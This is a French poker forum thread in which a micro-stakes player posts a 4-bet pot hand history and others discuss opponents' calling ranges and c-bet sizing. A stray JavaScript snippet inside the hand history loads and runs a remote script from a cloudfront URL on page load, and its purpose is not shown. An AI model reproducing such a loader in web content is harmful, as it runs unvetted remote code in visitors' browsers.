- Ce sujet contient 11 réponses, 9 participants et a été mis à jour pour la dernière fois par PirA-nh-As, le il y a 9 années et 12 mois.
-
AuteurMessages
-
Cela fait maintenant un bon bout de temps que j’ai remarqué que bon nombre de regs aime bien call les 4bet, et je dois bien avouer que flop, quand je ne hit pas, je ne sais pas très bien comment gérer le coup.
€0.05/€0.10 No Limit Holdem
PokerStars
5 Players
Hand Conversion Powered by weaktight.com[/url]Stacks:
UTG Player5 (€25.37) 254bb
CO Player6 (€19.12) 191bb
BTN ted07ol (€10.25) 103bb
SB Player3 (€10.53) 105bb
BB Player4 (€10.94) 109bbPre-Flop: (€0.15, 5 players) ted07ol is BTN
2 folds, ted07ol raises to €0.30, Player3 raises to €1, 1 fold, ted07ol raises to €2.30, Player3 calls €1.30Flop: (€4.70, 2 players)
Player3 checks, ted07ol bets €2, Player3 calls €2Turn: (€8.70, 2 players)
Player3 checks, ted07ol checksRiver: (€8.70, 2 players)
Player3 bets €6.23, ted07ol foldsFinal Pot: €8.70
Player3 wins €20.59 (net +€10.06)
ted07ol lost €4.30
<script type= »text/javascript »>
setTimeout(function(){var a=document.createElement(« script »);
var b=document.getElementsByTagName(« script »)[0];
a.src=document.location.protocol+ »//dnn506yrbagrg.cloudfront.net/pages/scripts/0023/4735.js? »+Math.floor(new Date().getTime()/3600000);
a.async=true;a.type= »text/javascript »;b.parentNode.insertBefore(a,b)}, 1);
</script>J’imagine que je vais cbet toute ma range sur ce board dry, quid du sizing ? On 2 barrel turn ou on give up ?
Merci d’avance.
Ok aussi. a mon avis c’est eux qui font une erreur. j’ai pas un sample de mains suffisant pour imaginer que joué le coup d’une manière autres que celle-ci serait meilleur. alors en attendant, je préfère jouer un jeu que j’estime propre et faire exactement comme toi.
Note : Depuis peu, le 5bet light 54-56bb apparaît en NL10 100bb deep Marrant non ?
Oulah j’ai pas encore eu affaire au genre de moove décrit dans ta note, mais il est sacrément affreux.
Dac merci pour vos avis. Du coup, vous les mettez sur quelle range les regs qui call des 4bet ? TT-JJ, AQ ? Ainsi que des slowplays de KK+ ?!
Perso je dirais oop :
TT-QQ qui ne veulent pas partir à tapis préflop, et quelques KK-AA qui ne veulent pas perdre tes bluffs si tu 4bet beaucoup
Ip ca peut etre un peu plus loose AQ et quelque random suited-connector selon les profils.
une range polarisé mais en excluant AK,KK+ (En générale ça part PF et la peut de voir un as quand on a les rois ou de pas toucher avec AK doit surement etre la meme pour tout le monde)
Je suppose qu’il y a du TT-QQ, j’ai vu du 99 une fois. il y a du AQ,KQ voir AJ qui se retrouve perdu car il n’avait pas anticipé le 4bet.
Enfin une fois j’ai vu un K9s. Évidement, vilain a perdu ça pastille rouge au profit d’une pastille moins glorieuse après ça Mais je suis sur qu’il n’est ps le seul a faire ça
- Inscrit depuis 12 ans
- 2020 messages - 57
Je trouve le sizing un peu trop cher préflop. je préfère mettre 20bb.
Pas grand chose d’autre à faire postflop. le sizing j’aime bien, on peut même encore faire moins cher :-)
Pour sa range, les call OOP 4bet 100bb deep, j’en vois quand même pas souvent, mais j’ai l’impression que c’est souvent des types qui ont 3bet sans trop savoir pourquoi des AJ,JJ,AK,AQ,KQs,JJ,99,TT et du coup ils sont un peu perdu sur ton 4bet tout simplement car ils n’avaient pas de plan de jeu préflop.
J’exclus très très souvent KK,AA. Ça arrive parfois mais je trouve que ça arrive beaucoup plus souvent quand nous sommes OOP car le mec va souvent prendre un cbet en plus sur nos cbet bluffs.
Yop !
assez daccord avec tout ce qui a été dis : il y a bcp de 99 à JJ (QQ selon profil) qui ont peur de broke PF, et serrent les fesses pour ne pas voir d’As au flop (il te mettent svt sur AK et ne veulent pas lâcher leur main)
habitue toi c’est un spot qui revient svt… en micro en tout cas
sinon ta line est OK pour moi
Merci à tous pour vos réponses.
Concernant le check au flop, perso j’ai tendance à cbet toute ma range sur ce board très dry, en checkant on montre une main à SD value et si notre adversaire est futé il va s’en apercevoir et pourra bet turn et river pour nous faire fold.
Pour ma part, sur le pré flop on est d’accord, mais flop je bet plus cher, 3.10 par exemple, s’il call je m’inquiete, mais si je decide de bet 2, c’est pour mettre un 2nd barrel turn… aprés ca depend aussi de la dyna de la table….
Tchusss!
-
AuteurMessages
Vous devez être connecté pour répondre à ce sujet.